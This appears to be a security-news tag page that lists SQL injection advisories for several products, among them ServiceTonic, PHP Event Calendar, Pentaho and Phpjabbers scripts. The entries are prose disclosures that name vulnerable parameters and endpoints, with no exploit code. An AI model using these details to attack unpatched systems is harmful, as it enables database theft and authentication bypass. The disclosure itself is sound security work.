Security
Headlines
HeadlinesLatestCVEs

Tag

#sql

Money Transfer Management System 1.0 SQL Injection

Money Transfer Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

Packet Storm
Open in Source
#vulnerability#vulnerability#vulnerability#vulnerability#vulnerability#sql#vulnerability#vulnerability#vulnerability#dos#vulnerability#vulnerability#sql#vulnerability#vulnerability#vulnerability#vulnerability#sql#vulnerability
CVE-2021-28022: Help Desk Software for your company | ServiceTonic

Blind SQL injection in the login form in ServiceTonic Helpdesk software < 9.0.35937 allows attacker to exfiltrate information via specially crafted HQL-compatible time-based SQL queries.

CVE-2021-42077: PHP Event Calendar Lite Edition SQL Injection ≈ Packet Storm

PHP Event Calendar before 2021-09-03 allows SQL injection, as demonstrated by the /server/ajax/user_manager.php username parameter. This can be used to execute SQL statements directly on the database, allowing an adversary in some cases to completely compromise the database system. It can also be used to bypass the login form.

CVE-2021-34684: Security Information : Hitachi Incident Response Team : Hitachi

Hitachi Vantara Pentaho Business Analytics through 9.1 allows an unauthenticated user to execute arbitrary SQL queries on any Pentaho data source and thus retrieve data from the related databases, as demonstrated by an api/repos/dashboards/editor URI.

CVE-2020-22225: Phpjabbers Fundraising Script 1.0 - Pastebin.com

Stivasoft (Phpjabbers) Fundraising Script v1.0 was discovered to contain a SQL injection vulnerability via the pjActionLoadForm function.

CVE-2020-22223: Phpjabbers Fundraising Script 1.0 - Pastebin.com

Stivasoft (Phpjabbers) Fundraising Script v1.0 was discovered to contain a SQL injection vulnerability via the pjActionLoad function.

CVE-2020-22226: Phpjabbers Fundraising Script 1.0 - Pastebin.com

Stivasoft (Phpjabbers) Fundraising Script v1.0 was discovered to contain a SQL injection vulnerability via the pjActionSetAmount function.

Pentaho Business Analytics / Pentaho Business Server 9.1 SQL Injection

Pentaho allows users to create and manage Data Sources. Users can select a Data Source when creating a Dashboard through the Pentaho User Console. When a Data Source is added, Pentaho makes a HTTP request to the dashboards editor (/pentaho/api/repos/dashboards/editor) in order to test the connection by executing a test SQL query. However, further examination revealed that by utilizing CVE-2021-31602, an authentication bypass of Spring APIs, it is possible for an unauthenticated user to execute arbitrary SQL queries on any Pentaho datasource and thus retrieve data from the related databases.